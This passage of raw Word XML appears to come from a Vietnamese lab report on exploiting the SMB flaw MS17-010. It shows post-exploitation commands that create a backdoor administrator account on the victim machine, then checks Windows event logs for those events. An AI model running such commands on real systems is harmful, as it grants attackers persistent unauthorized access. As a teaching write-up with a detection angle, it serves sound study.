        <w:t>. exploit máy victim</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tạo user và add user vào nhóm admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>net user Chinh Pass1234 /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>net localgroup Administrators Chinh /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DBD81FF" wp14:editId="4A30FC3C">
            <wp:extent cx="4620270" cy="733527"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="16958491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9191" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4620270" cy="733527"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54497984" wp14:editId="21C79020">
            <wp:extent cx="4710547" cy="623455"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1594191140" name="Hình ảnh 159419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9040" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4711206" cy="623542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="26" w:lineRule="atLeast"/>
        <w:ind w:firstLine="1530"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc130209122"/>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">hình </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>. tạo user và add user vào nhóm admin</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào windows logs để kiểm tra lại:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF0E6ED" wp14:editId="57D800FE">
            <wp:extent cx="5760720" cy="1995580"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="5977995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9510" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1995580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1890"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc130209128"/>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32</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. thông tin sự kiện trong windows logs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:keepNext/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14AAE386" wp14:editId="7AE73796">
            <wp:extent cx="5760720" cy="2847590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2103088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69" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2847590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1710"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc130209129"/>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">hình </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separate"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>kiểm tra sự kiện thêm user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="134C6045" wp14:editId="7415E465">
            <wp:extent cx="5760720" cy="2630147"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="368430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0265" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="2630147"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:ind w:firstLine="1710"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>hình 34</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end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. kiểm tra sự kiện thêm user vào group admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06E7F2C7" wp14:editId="0B5967FB">
            <wp:extent cx="5611008" cy="1038370"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="775483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153" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5611008" cy="1038370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>hình 34</w:t>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00714E67">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. Vào cmd kiểm tra địa chỉ ip đã đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00714E67" w:rsidRPr="00714E67" w:rsidRDefault="00714E67" w:rsidP="00714E67">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED5157" w:rsidRDefault="00ED5157" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tài liệu tham khảo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED5157" w:rsidRDefault="00ED5157" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00ED5157">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.forum.vnpro.org/forum/ccnp-security/security-core/421645-l%E1%BB%97-h%E1%BB%95ng-tr%C3%AAn-giao-th%E1%BB%A9c-smb-cve-2017-0143-c%C3%A1ch-exploit-v%C3%A0-protect</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00ED5157" w:rsidRPr="00714E67" w:rsidRDefault="00ED5157" w:rsidP="00837B3A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00ED5157">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://tuhocnetworksecurity.business.blog/2021/07/15/windows-pentest-can-ban-ung-dung-metasploit-khai-thac-lo-h</w:t>
        </w:r>
        <w:bookmarkStart w:id="15" w:name="_GoBack"/>
        <w:bookmarkEnd w:id="15"/>
        <w:r w:rsidRPr="00ED5157">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>ong-ms17-010/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00ED5157" w:rsidRPr="00714E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3A"/>
    <w:rsid w:val="00714E67"/>
    <w:rsid w:val="00837B3A"/>
    <w:rsid w:val="008C394D"/>
    <w:rsid w:val="00A04EEE"/>
    <w:rsid w:val="00A40863"/>
    <w:rsid w:val="00AB46B2"/>
    <w:rsid w:val="00ED5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12B86"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{03F6CE60-A778-40DF-9EE2-33F3D2463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4E67"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:spacing w:val="6"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED51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44534">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="518815601">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="651908813">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="201919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tuhocnetworksecurity.business.blog/2021/07/15/windows-pentest-can-ban-ung-dung-metasploit-khai-thac-lo-hong-ms17-010/"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forum.vnpro.org/forum/ccnp-security/security-core/421645-l%E1%BB%97-h%E1%BB%95ng-tr%C3%AAn-giao-th%E1%BB%A9c-smb-cve-2017-0143-c%C3%A1ch-exploit-v%C3%A0-prot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2023-05-13T09:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-14T06:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>